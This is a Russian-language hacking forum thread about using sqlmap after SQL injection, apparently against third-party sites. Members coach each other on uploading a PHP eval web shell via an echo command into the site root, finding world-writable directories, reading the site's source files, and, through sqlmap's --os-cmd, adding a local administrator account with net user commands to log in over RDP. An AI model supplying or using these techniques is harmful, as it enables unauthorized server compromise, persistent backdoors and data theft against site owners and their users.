Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Как поменять через sqlmamp допустим пароль ? там стоит хешь а я хочу поставить свой хешь
     
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Как залить shell
    Code:
    current user is DBA:    True
    команда --os-cmd –v l не помогает пробовал как по дефолту так и брутом директорию найти куда залить не помогло
     
    #562 Sensoft, 11 Jan 2018
    Last edited: 11 Jan 2018
  3. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    У меня похожая проблема, не могу залить шёл, подскажите куда ещё можно копнуть.

    Есть доступ к pma, есть file_priv, есть раскрытые пути, есть доступ к файлам(через load_file) /etc/passwd и тд.

    Into outfile работает в /var/tmp/ но в /var/www/html/ и дальше не работает

    Есть креды к фтп, но сам сервер не але.
    Есть доступ в админку, но там нет заливки файлов.

    Заранее благодарю за помощь.
     
  4. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    ну если в /var/tmp/ пишет а в нужную нет, то очевидно что процессу мускула не хватает прав на запись в эту диру, скорее всего права там стоят 755 и владелец явно не mysql
    ищи ту,на которой стоят 777
     
  5. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    да, спасибо, я так и думал делать, но только я что-то не знаю, какими средствами найти такую папку в рамках /var/www/html/ . может есть какие-то стандартные или не стандартные вектора. пока мне на ум пришло только просканить все бурпом и сформировать список директорий, чтобы подсунуть в sqlmap для попытки залиться туда
     
  6. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    частенько бывает когда выставляют 777 на директории по типу upload,images,tmp,cache и тд
    смотри первым делом в эту сторону
    ты говорил что есть полные пути и возможность чтения файлов - почитай исходники сайта, посмотри куда заливаются файлы, где хранится кеш
    брутить список директорий это крайний вариант в данном случае
     
    ShpillyWilly likes this.
  7. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    Ребят подскажите как залить шелл на Windows Server 2005, пользователь sa, права true, через sqlmap выполнил --os-shell смотрю директории. Что делать дальше ума не приложу....
     
  8. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    ну я в принципе понял --os-cmd=? только толку, какие команды выполнить надо?)
     
  9. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    Code:
    echo ^<?php eval($_GET['c']); ?^> > C:\path_to_document_root\shell.php
     
    Siriak likes this.
  10. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    пишет не удается найти указанный путь...
     
    ShpillyWilly likes this.
  11. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    ну разумеется вместо C:\path_to_document_root\shell.php нужно указать путь до директории где лежат файлы сайта
     
  12. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    так ясен пень что указываю свою директорию))
     
  13. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    ясн, раздел создан для вопросов. Я задал вопрос, не все такие гуру как ты.
     
  14. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    попробуй для начала вывести
    Code:
    echo test > C:\путь\test.txt
     
    Siriak likes this.
  15. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    текстовый проливает и .aspx, но не php
     
  16. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    Спасибо ребят за подсказки, разобрался. BabaDook особенно спасибо что направил на путь истинный насчет net user /add , почитал инфу и разобрался.
     
    BabaDook likes this.
  17. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    можно по подробней тоже интересно
     
  18. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    Все оказалась проще некуда, если у тебя права True
    Через sqlmap прописал нового пользователя RDP командами
    net user Admin Pass /add
    net localgroup administrators Admin /add
     
    BabaDook likes this.
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    и ты типа можешь на сервер зайти ?
     
  20. Siriak

    Siriak Member

    Joined:
    2 Aug 2012
    Messages:
    320
    Likes Received:
    35
    Reputations:
    5
    Конечно